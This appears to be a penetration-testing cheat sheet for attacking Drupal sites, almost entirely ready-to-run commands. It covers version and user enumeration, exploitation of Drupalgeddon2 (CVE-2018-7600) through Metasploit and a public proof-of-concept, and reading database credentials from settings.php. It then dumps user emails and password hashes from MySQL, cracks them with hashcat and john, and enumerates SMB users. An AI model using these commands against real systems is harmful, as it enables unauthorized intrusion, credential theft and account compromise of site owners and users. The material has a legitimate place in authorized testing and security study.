Drupal Attacks
Version Detection
| Command | Description |
|---|---|
curl http://<IP>/CHANGELOG.txt | head -5 | Drupal version from changelog (most reliable). |
curl http://<IP>/core/CHANGELOG.txt | head -5 | Drupal 8+ changelog path. |
curl http://<IP>/?q=user/login | Confirm Drupal login page. |
curl http://<IP>/robots.txt | Drupal usually exposes interesting paths here. |
User Enumeration
| Command | Description |
|---|---|
curl http://<IP>/?q=user/1 | View user profile for UID 1 (usually admin). |
curl http://<IP>/node/1 | First published content node - reveals author. |
Exploitation - Drupalgeddon2 (CVE-2018-7600) - Drupal < 7.58 / 8.x < 8.3.9
# Metasploit
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS <IP>
set TARGETURI /
run
# Lands as www-data# Manual PoC
git clone https://github.com/dreadlocked/Drupalgeddon2
ruby drupalgeddon2.rb http://<IP>/Post-Access - Database Enumeration
Credentials are stored in sites/default/settings.php:
cat /var/www/html/sites/default/settings.php | grep -A5 "database"Connect and extract user hashes:
mysql -u drupal -p<password> -e "SELECT name, mail, pass FROM drupal.users;"| Field | Description |
|---|---|
name | Username |
mail | Email address |
pass | Password hash - Drupal 7 uses $S$ SHA-512 iterated (mode 7900 in hashcat) |
Hash Cracking - Drupal 7
hashcat -m 7900 drupal_hashes.txt /usr/share/wordlists/rockyou.txtjohn --format=drupal7 drupal_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txtSMB User Enumeration (Linux Samba)
enum4linux -r -u "" -p "" <IP> # RID cycling - enumerate OS users
enum4linux -a <IP> # Full enumerationUseful Paths
| Path | Description |
|---|---|
/CHANGELOG.txt | Drupal version |
/sites/default/settings.php | Database credentials |
/?q=user/login | Login page |
/?q=admin | Admin panel |
/node/add | Add content (requires auth) |